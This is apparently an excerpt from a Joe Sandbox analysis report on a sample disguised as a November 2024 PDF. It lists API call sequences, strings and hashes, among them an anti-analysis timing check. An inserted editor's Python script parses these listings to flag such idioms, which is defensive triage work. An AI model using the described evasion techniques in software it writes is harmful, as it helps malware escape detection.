                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 44706859-0
                                                                                                                      • Opcode ID: 5d4b9ec31aa8de7e9cceaf0f29e765d6a06d51787b357b5ca3da98e85298f33c
                                                                                                                      • Instruction ID: ab9e400f23ae58839e06bf833facd7e5aab3623e65254a8a0d1bcaf795f24f97
                                                                                                                      • Opcode Fuzzy Hash: 5d4b9ec31aa8de7e9cceaf0f29e765d6a06d51787b357b5ca3da98e85298f33c
                                                                                                                      • Instruction Fuzzy Hash: 1DF0C270201304AFEB111FA4EC88E677BBCEF8A754B144126F946C7151CB79DD00DA61
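The timing entry above (QueryPerformanceCounter, QueryPerformanceFrequency, Sleep, QueryPerformanceCounter, Sleep at 007B5502 to 007B555E) and the three size-probe entries (GetUserObjectSecurity at 007A8766, GetTokenInformation at 007A8608 and, with TokenIntegrityLevel, at 007A8669) are recognisable from the API order alone: the first is what the report's "Contains functionality for execution timing" signature refers to, the second is the query-size, allocate, re-query idiom. What follows is an added example, not Joe Sandbox code, that pulls those ordered sequences out of the report text and tags them. SAMPLE is constructed from lines of this report; the function names and the two heuristics are the editor's own assumptions.

```python
"""Parse the 'APIs' listings of a Joe Sandbox function dump into ordered call
sequences and flag two idioms visible in this report: the execution-timing check
(timing source, Sleep, timing source again) and the size-probe idiom (API,
GetLastError, HeapAlloc, same API again). Added example, not Joe Sandbox code:
SAMPLE is constructed from lines in this report; names and heuristics are the
editor's assumptions."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# "• Sleep.KERNEL32(00000000,?), ref: 007B5518" or "• DeleteObject.GDI32 ref: 00751401"
API_LINE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{6,8})$"
)
TIMING_SOURCES = {"QueryPerformanceCounter", "GetTickCount", "GetTickCount64", "timeGetTime"}

SAMPLE = """\
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B5502
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007B5510
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B5518
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007B5522
• Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B555E
Memory Dump Source
• Opcode ID: 05c265378fd5870b7b9e58fae65d383626ef1f94cbed2c8a30a7a3354f5e7eb6
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007A8669
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007A8673
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8682
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8689
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A869F
Memory Dump Source
• Opcode ID: 5d4b9ec31aa8de7e9cceaf0f29e765d6a06d51787b357b5ca3da98e85298f33c
APIs
• EndPath.GDI32(?), ref: 007513BF
• DeleteObject.GDI32 ref: 00751401
"""

@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: str
    ref: int  # call-site address inside the dumped image

def parse_api_blocks(text: str) -> List[Dict]:
    """One record per function entry: ordered calls plus the Opcode ID, if present."""
    entries: List[Dict] = []
    current: Optional[Dict] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = {"calls": [], "opcode_id": None}
            entries.append(current)
        elif current is None:
            continue
        elif (m := API_LINE.match(line)):
            current["calls"].append(Call(m["api"], m["module"], m["args"] or "", int(m["ref"], 16)))
        elif line.startswith("• Opcode ID:"):
            current["opcode_id"] = line.split(":", 1)[1].strip()
    return entries

def has_timing_check(calls: List[Call]) -> bool:
    """Timing source, Sleep, timing source again: the measured delta is compared with
    the requested sleep to detect single-stepping or a sandbox that skips sleeps."""
    seen_source = slept = False
    for name in (c.api for c in calls):
        if name in TIMING_SOURCES and slept:
            return True
        if name in TIMING_SOURCES:
            seen_source = True
        elif name == "Sleep" and seen_source:
            slept = True
    return False

def size_probe_apis(calls: List[Call]) -> List[str]:
    """APIs called twice with GetLastError and HeapAlloc in between: the first call
    fails with ERROR_INSUFFICIENT_BUFFER and returns the size, the second fills the buffer."""
    names = [c.api for c in calls]
    found = []
    for api in dict.fromkeys(names):  # first-seen order, de-duplicated
        idx = [i for i, n in enumerate(names) if n == api]
        if len(idx) >= 2 and {"GetLastError", "HeapAlloc"} <= set(names[idx[0] + 1:idx[-1]]):
            found.append(api)
    return found

def annotated_constants(calls: List[Call]) -> List[str]:
    """Names Joe Sandbox attaches to recognised constants, e.g. 00000003(TokenIntegrityLevel)."""
    return sorted({c for call in calls for c in re.findall(r"\(([A-Za-z_]\w*)\)", call.args)})

def triage(text: str) -> List[Dict]:
    out = []
    for fn in parse_api_blocks(text):
        tags = ["execution-timing"] if has_timing_check(fn["calls"]) else []
        for api in size_probe_apis(fn["calls"]):
            tags.append(f"size-probe:{api}({','.join(annotated_constants(fn['calls']))})")
        out.append({"opcode_id": fn["opcode_id"], "apis": [c.api for c in fn["calls"]], "tags": tags})
    return out
```

Run `triage()` over the saved text of a report to get, per function entry, its Opcode ID, the API order and any tags; the Opcode ID is what lets the same function be matched across samples in the Similarity section. Both heuristics are purely order-based, so a genuine benchmark loop and an anti-debug timing check look identical to them; the sandbox's own signatures remain the authority, and the tags are only a way to find the entries worth opening in the disassembler.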
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 007AC6BA
                                                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 007AC6D1
                                                                                                                      • MessageBeep.USER32(00000000), ref: 007AC6E9
                                                                                                                      • KillTimer.USER32(?,0000040A), ref: 007AC705
                                                                                                                      • EndDialog.USER32(?,00000001), ref: 007AC71F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3741023627-0
                                                                                                                      • Opcode ID: 4e2dd8d5db09acd9e1fbbd28aa094c28e2f48bb2476d983daeef0e1a58973bf8
                                                                                                                      • Instruction ID: 1274398bd774fa6ed33a5c5c30bd02029832c4f829c36b4c1eebc223936782e4
                                                                                                                      • Opcode Fuzzy Hash: 4e2dd8d5db09acd9e1fbbd28aa094c28e2f48bb2476d983daeef0e1a58973bf8
                                                                                                                      • Instruction Fuzzy Hash: 28018630501704ABEB229B20DD4EF9677B8FF01705F04466AF543A14E1DBF8A9548F94
                                                                                                                      APIs
                                                                                                                      • EndPath.GDI32(?), ref: 007513BF
                                                                                                                      • StrokeAndFillPath.GDI32(?,?,0078BAD8,00000000,?), ref: 007513DB
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 007513EE
                                                                                                                      • DeleteObject.GDI32 ref: 00751401
                                                                                                                      • StrokePath.GDI32(?), ref: 0075141C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2625713937-0
                                                                                                                      • Opcode ID: a22053eedcad435fe555f748fadb6bfe91bef5e1a06028ddb46ec11ac837763c
                                                                                                                      • Instruction ID: 7da069c7e559202844fb980221850a0ef5f74407969f5a4d5037bc0a876ad11a
                                                                                                                      • Opcode Fuzzy Hash: a22053eedcad435fe555f748fadb6bfe91bef5e1a06028ddb46ec11ac837763c
                                                                                                                      • Instruction Fuzzy Hash: 95F0C930005248EBDB115F2AEC0C7983BB9BB01327F54C235E8AA894F1D77989A9DF54
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00770FF6: std::exception::exception.LIBCMT ref: 0077102C
                                                                                                                        • Part of subcall function 00770FF6: __CxxThrowException@8.LIBCMT ref: 00771041
                                                                                                                        • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                                                                                                                        • Part of subcall function 00757BB1: _memmove.LIBCMT ref: 00757C0B
                                                                                                                      • __swprintf.LIBCMT ref: 0076302D
                                                                                                                      Strings
                                                                                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00762EC6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                      • API String ID: 1943609520-557222456
                                                                                                                      • Opcode ID: 79e1aca166ee05fbb2a6918c341636e4624ee47315f95b149ec7fbe657e5b707
                                                                                                                      • Instruction ID: cee77dc52245df8a951c33cb649eee049c029290c655184a927d4477075a8b0e
                                                                                                                      • Opcode Fuzzy Hash: 79e1aca166ee05fbb2a6918c341636e4624ee47315f95b149ec7fbe657e5b707
                                                                                                                      • Instruction Fuzzy Hash: 07919071508341DFCB18EF24E999CAEB7A9EF85740F00491DF846972A1DB78EE48CB52
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007548AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007548A1,?,?,007537C0,?), ref: 007548CE
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 007BBC26
                                                                                                                      • CoCreateInstance.OLE32(007E2D6C,00000000,00000001,007E2BDC,?), ref: 007BBC3F
                                                                                                                      • CoUninitialize.OLE32 ref: 007BBC5C
                                                                                                                        • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                                                                                                                        • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                      • String ID: .lnk
                                                                                                                      • API String ID: 2126378814-24824748
                                                                                                                      • Opcode ID: f04b9531967393c991328f5b202f6161ebb0542d274d8e96565b552f972d6d72
                                                                                                                      • Instruction ID: e0ab916bdfd0b03a1a7e433e8e83ac8a4a2ce8964dd2692d3c633d433da15f70
                                                                                                                      • Opcode Fuzzy Hash: f04b9531967393c991328f5b202f6161ebb0542d274d8e96565b552f972d6d72
                                                                                                                      • Instruction Fuzzy Hash: E8A12375604205DFCB00DF14C484E9ABBE5FF88314F148998F99A9B2A1CB79ED49CB91
                                                                                                                      APIs
                                                                                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 007AB981
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ContainedObject
                                                                                                                      • String ID: AutoIt3GUI$Container$%~
                                                                                                                      • API String ID: 3565006973-1172083821
                                                                                                                      • Opcode ID: 6c113ee0b024895ffc22a1c493ee424958c33274c8ed89104b727f86a2282cda
                                                                                                                      • Instruction ID: 424e89e8e5d540f711a4a718263982cc2cb262970c31f9f45cf7e3743f4d5973
                                                                                                                      • Opcode Fuzzy Hash: 6c113ee0b024895ffc22a1c493ee424958c33274c8ed89104b727f86a2282cda
                                                                                                                      • Instruction Fuzzy Hash: D9914C71600201DFDB64DF68C884A6AB7F9FF89710F14856DF949DB2A2DB74E841CB50
                                                                                                                      APIs
                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 007752DD
                                                                                                                        • Part of subcall function 00780340: __87except.LIBCMT ref: 0078037B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorHandling__87except__start
                                                                                                                      • String ID: pow
                                                                                                                      • API String ID: 2905807303-2276729525
                                                                                                                      • Opcode ID: b35c5048295206ad2d3b81c1b182f56155c3c1b146d86e506d7f7283e7dbc9cc
                                                                                                                      • Instruction ID: f1f9bc96f9922446245bde2e2b25d3f8b12b60e944e84e7ca5bcd0d5a4796e94
                                                                                                                      • Opcode Fuzzy Hash: b35c5048295206ad2d3b81c1b182f56155c3c1b146d86e506d7f7283e7dbc9cc
                                                                                                                      • Instruction Fuzzy Hash: 0F517A61A89A41C7DF947724C94137A2B94AB013D0F20CD58E49D866F6EFBC8CD8DBC6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #$+
                                                                                                                      • API String ID: 0-2552117581
                                                                                                                      • Opcode ID: 00c6eb9c866c16234d15b2a0a073fa758a6c6be1ff2b1e131b843f3f7d8cee26
                                                                                                                      • Instruction ID: d14933629a63ba150fa1115b3e3bf7fcc42240a7335a2b226ba702bf2970cf3a
                                                                                                                      • Opcode Fuzzy Hash: 00c6eb9c866c16234d15b2a0a073fa758a6c6be1ff2b1e131b843f3f7d8cee26
                                                                                                                      • Instruction Fuzzy Hash: F0512375604646DFCF15DF28C888AFA7BA4EF96310F188155FC959B2A0D73C9C46CBA0
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$_free
                                                                                                                      • String ID: Oav
                                                                                                                      • API String ID: 2620147621-1091017984
                                                                                                                      • Opcode ID: 014deabd5610636d52b88ca0d0a30ab1a41dc2f39ecc3f3179e32268f2c8e641
                                                                                                                      • Instruction ID: 2115092af10062b167c9e9c675ed653636da52c0aff2eabddc21883810e9caf2
                                                                                                                      • Opcode Fuzzy Hash: 014deabd5610636d52b88ca0d0a30ab1a41dc2f39ecc3f3179e32268f2c8e641
                                                                                                                      • Instruction Fuzzy Hash: 7B5149716183419FDB28CF28C451B2BBBE1FF85314F44892DE98A87351EB39E901CB92
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$_memmove
                                                                                                                      • String ID: ERCP
                                                                                                                      • API String ID: 2532777613-1384759551
                                                                                                                      APIs
                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007DF910,00000000,?,?,?,?), ref: 007D7C4E
                                                                                                                      • GetWindowLongW.USER32 ref: 007D7C6B
                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007D7C7B
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Long
                                                                                                                      • String ID: SysTreeView32
                                                                                                                      • API String ID: 847901565-1698111956
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007D76D0
                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007D76E4
                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 007D7708
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window
                                                                                                                      • String ID: SysMonthCal32
                                                                                                                      • API String ID: 2326795674-1439706946
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007D6FAA
                                                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007D6FBA
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007D6FDF
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$MoveWindow
                                                                                                                      • String ID: Listbox
                                                                                                                      • API String ID: 3315199576-2633736733
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007D79E1
                                                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007D79F6
                                                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007D7A03
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: msctls_trackbar32
                                                                                                                      • API String ID: 3850602802-1010561917
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00754C2E), ref: 00754CA3
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00754CB5
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                      • API String ID: 2574300362-192647395
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00754D2E,?,00754F4F,?,008162F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754D6F
                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00754D81
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                      • API String ID: 2574300362-3689287502
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00754CE1,?), ref: 00754DA2
                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00754DB4
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                      • API String ID: 2574300362-1355242751
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,007D12C1), ref: 007D1080
                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007D1092
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                      • API String ID: 2574300362-4033151799
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000001,007C9009,?,007DF910), ref: 007C9403
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 007C9415
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetModuleHandleExW$kernel32.dll
• API String ID: 2574300362-199464113
APIs
Strings
Similarity
• API ID: LocalTime__swprintf
• String ID: %.3d$WIN_XPe
• API String ID: 2070861257-2409531811
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• CharLowerBuffW.USER32(?,?), ref: 007CE3D2
• CharLowerBuffW.USER32(?,?), ref: 007CE415
  • Part of subcall function 007CDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007CDAD9
• VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 007CE615
• _memmove.LIBCMT ref: 007CE628
Similarity
• API ID: BuffCharLower$AllocVirtual_memmove
• String ID:
• API String ID: 3659485706-0
APIs
• CoInitialize.OLE32(00000000), ref: 007C83D8
• CoUninitialize.OLE32 ref: 007C83E3
  • Part of subcall function 007ADA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007ADAC5
• VariantInit.OLEAUT32(?), ref: 007C83EE
• VariantClear.OLEAUT32(?), ref: 007C86BF
Similarity
• API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
• String ID:
• API String ID: 780911581-0
APIs
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
APIs
• GetWindowRect.USER32(0190DB70,?), ref: 007D9AD2
• ScreenToClient.USER32(00000002,00000002), ref: 007D9B05
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 007D9B72
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 007C6CE4
• WSAGetLastError.WSOCK32(00000000), ref: 007C6CF4
  • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
  • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 007C6D58
• WSAGetLastError.WSOCK32(00000000), ref: 007C6D64
Similarity
• API ID: ErrorLast$__itow__swprintfsocket
• String ID:
• API String ID: 2214342067-0
APIs
• #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,007DF910), ref: 007C67BA
• _strlen.LIBCMT ref: 007C67EC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
